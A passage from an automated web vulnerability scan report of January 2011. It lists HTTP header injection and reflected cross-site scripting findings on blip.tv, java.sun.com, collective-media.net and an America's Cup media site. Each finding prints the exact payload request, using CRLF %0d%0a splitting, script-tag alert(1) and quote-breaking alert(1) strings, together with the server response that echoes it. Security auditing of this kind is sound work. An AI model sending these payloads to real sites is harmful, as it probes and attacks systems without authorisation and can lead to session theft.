43cf9793345

Content-Type: text/html; charset=iso-8859-1
Content-Length: 293
Date: Thu, 20 Jan 2011 00:39:11 GMT
X-Varnish: 1248912469
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/67fe1
43cf9793345">here</a>
...[SNIP]...

2.244. http://blip.tv/tools/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /tools/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 58140%0d%0a77d07a20ef2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /58140%0d%0a77d07a20ef2/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/58140
77d07a20ef2
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 279
Date: Thu, 20 Jan 2011 00:39:01 GMT
X-Varnish: 1025272549
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/58140
77d07a20ef2/">here</a
...[SNIP]...

2.245. http://blip.tv/tos/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /tos/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload eeffd%0d%0aee8661e2d6a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /eeffd%0d%0aee8661e2d6a/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/eeffd
ee8661e2d6a
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 294
Date: Thu, 20 Jan 2011 00:39:09 GMT
X-Varnish: 2146052258
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/eeffd
ee8661e2d6a/">here</a
...[SNIP]...

2.246. http://blip.tv/users/blogging_info [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/blogging_info

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2bbca%0d%0a3f56472e5e4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2bbca%0d%0a3f56472e5e4/blogging_info?posts_id=4658178&no_wrap=1 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/2bbca
3f56472e5e4
/blogging_info?posts_id=4658178&no_wrap=1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 323
Date: Thu, 20 Jan 2011 00:38:54 GMT
X-Varnish: 1248909706
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/2bbca
3f56472e5e4/blogging_
...[SNIP]...

2.247. http://blip.tv/users/blogging_info [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/blogging_info

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 61ba9%0d%0a48398cbb55a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /users/61ba9%0d%0a48398cbb55a?posts_id=4658178&no_wrap=1 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/users/61ba9
48398cbb55a
?posts_id=4658178&no_wrap=1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 315
Date: Thu, 20 Jan 2011 00:38:55 GMT
X-Varnish: 1324531887
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/users/61ba9
48398cbb55a?pos
...[SNIP]...

2.248. http://blip.tv/users/create/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/create/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b978d%0d%0a85dffaa1bb8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b978d%0d%0a85dffaa1bb8/create/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/b978d
85dffaa1bb8
/create/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:51 GMT
X-Varnish: 1248909074
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/b978d
85dffaa1bb8/create/">
...[SNIP]...

2.249. http://blip.tv/users/create/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/create/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b0b83%0d%0a934141a9f8a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /users/b0b83%0d%0a934141a9f8a/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/users/b0b83
934141a9f8a
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:38:51 GMT
X-Varnish: 1274885483
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/users/b0b83
934141a9f8a/">h
...[SNIP]...

2.250. http://blip.tv/users/login/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/login/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8a64b%0d%0a295d52c66b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8a64b%0d%0a295d52c66b0/login/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/8a64b
295d52c66b0
/login/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 300
Date: Thu, 20 Jan 2011 00:38:51 GMT
X-Varnish: 1324531121
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/8a64b
295d52c66b0/login/">h
...[SNIP]...

2.251. http://blip.tv/users/login/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/login/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 105d8%0d%0a88428ed14e8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /users/105d8%0d%0a88428ed14e8/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/users/105d8
88428ed14e8
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:38:51 GMT
X-Varnish: 2146049249
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/users/105d8
88428ed14e8/">h
...[SNIP]...

2.252. http://blip.tv/users/stats/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/stats/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e17ed%0d%0ad0c42b6818c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e17ed%0d%0ad0c42b6818c/stats/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e17ed
d0c42b6818c
/stats/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:38:53 GMT
X-Varnish: 1274885804
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e17ed
d0c42b6818c/stats/">h
...[SNIP]...

2.253. http://blip.tv/users/stats/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /users/stats/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 3080a%0d%0ad04494d6657 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /users/3080a%0d%0ad04494d6657/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/users/3080a
d04494d6657
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:38:53 GMT
X-Varnish: 1498220902
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/users/3080a
d04494d6657/">h
...[SNIP]...

2.254. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 2811c%0d%0ac2ddb1d3f25 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab2811c%0d%0ac2ddb1d3f25 HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 20 Jan 2011 00:42:25 GMT
Location: /update/1.4.2/jinstall-1_4_2-windows-i586.cab2811c
c2ddb1d3f25

Content-length: 0
Connection: close


3. Cross-site scripting (reflected)  previous  next
There are 41 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.collective-media.net/ad/cm.martini/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.martini/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 621ff<script>alert(1)</script>e20b2a52729 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad621ff<script>alert(1)</script>e20b2a52729/cm.martini/ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; mmpg=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 69
Vary: Accept-Encoding
Date: Thu, 20 Jan 2011 00:35:10 GMT
Connection: close

unknown path /ad621ff<script>alert(1)</script>e20b2a52729/cm.martini/

3.2. http://a.collective-media.net/adj/cm.martini/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.martini/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f4db'-alert(1)-'1de1bb3448d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.martini3f4db'-alert(1)-'1de1bb3448d/;sz=728x90;click0=http%3a%2f%2fad.afy11.net%2fad%3fc%3dEPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ9zsbGZN4CyKa6mnyBGPxQkyumws5Xt6rwuZek5LVXWIZUsD%2bx8G9fs11dXeU4%3d!;ord=3271752524? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 438
Date: Thu, 20 Jan 2011 00:26:52 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 19-Feb-2011 00:26:52 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.martini3f4db'-alert(1)-'1de1bb3448d/;sz=728x90;net=cm;ord=3271752524;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.3. http://a.collective-media.net/adj/cm.martini/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.martini/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ebe1'-alert(1)-'2b9cb0141a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.martini/;sz=728x90;click0=http%3a%2f%2fad.afy11.net%2fad%3fc%3dEPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ9zsbGZN4CyKa6mnyBGPxQkyumws5Xt6rwuZek5LVXWIZUsD%2bx8G9fs11dXeU4%3d!;ord=3271752524?&4ebe1'-alert(1)-'2b9cb0141a4=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 442
Date: Thu, 20 Jan 2011 00:26:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 19-Feb-2011 00:26:51 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.martini/;sz=728x90;net=cm;ord=3271752524?&4ebe1'-alert(1)-'2b9cb0141a4=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/cm.martini/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.martini/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a595d'-alert(1)-'08a39541440 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.martini/;sz=728x90;click0=http%3a%2f%2fad.afy11.net%2fad%3fc%3dEPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ9zsbGZN4CyKa6mnyBGPxQkyumws5Xt6rwuZek5LVXWIZUsD%2bx8G9fs11dXeU4%3d!;ord=3271752524?a595d'-alert(1)-'08a39541440 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 439
Date: Thu, 20 Jan 2011 00:26:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 19-Feb-2011 00:26:51 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.martini/;sz=728x90;net=cm;ord=3271752524?a595d'-alert(1)-'08a39541440;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://americascup.mediaaccess.evolix.net/index.php [co parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://americascup.mediaaccess.evolix.net
Path:   /index.php

Issue detail

The value of the co request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 80dea'><script>alert(1)</script>985349a7ad9 was submitted in the co parameter. This input was echoed as 80dea\'><script>alert(1)</script>985349a7ad9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?lang=en&fn=folio&FolioID=82&co=180dea'><script>alert(1)</script>985349a7ad9 HTTP/1.1
Host: americascup.mediaaccess.evolix.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:37:31 GMT
Server: Apache
Set-Cookie: PHPSESSID=882939946f78dec4fe5d77aa92196538; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 188578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media -
...[SNIP]...
<input type='hidden' name='co' id='co' value='180dea\'><script>alert(1)</script>985349a7ad9'>
...[SNIP]...

3.6. http://americascup.mediaaccess.evolix.net/index.php [co parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://americascup.mediaaccess.evolix.net
Path:   /index.php

Issue detail

The value of the co request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69038"><script>alert(1)</script>d659b058562 was submitted in the co parameter. This input was echoed as 69038\"><script>alert(1)</script>d659b058562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?lang=en&fn=folio&FolioID=82&co=169038"><script>alert(1)</script>d659b058562 HTTP/1.1
Host: americascup.mediaaccess.evolix.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:37:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=f9889914ca2b88440659f29a0afa8321; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 188578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media -
...[SNIP]...
<a href="AC-45--wing-and-platform-finalization,82,169038\"><script>alert(1)</script>d659b058562,en,fp.html" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('imgpetite','','./taiga/americascup/4pictos_vign_petite_on.gif',1)">
...[SNIP]...

3.7. http://armchairmango.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://armchairmango.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5887"><script>alert(1)</script>9370de61105 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?e5887"><script>alert(1)</script>9370de61105=1 HTTP/1.1
Host: armchairmango.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Thu, 03-Feb-2011 00:37:47 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Thu, 03-Feb-2011 00:37:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52415
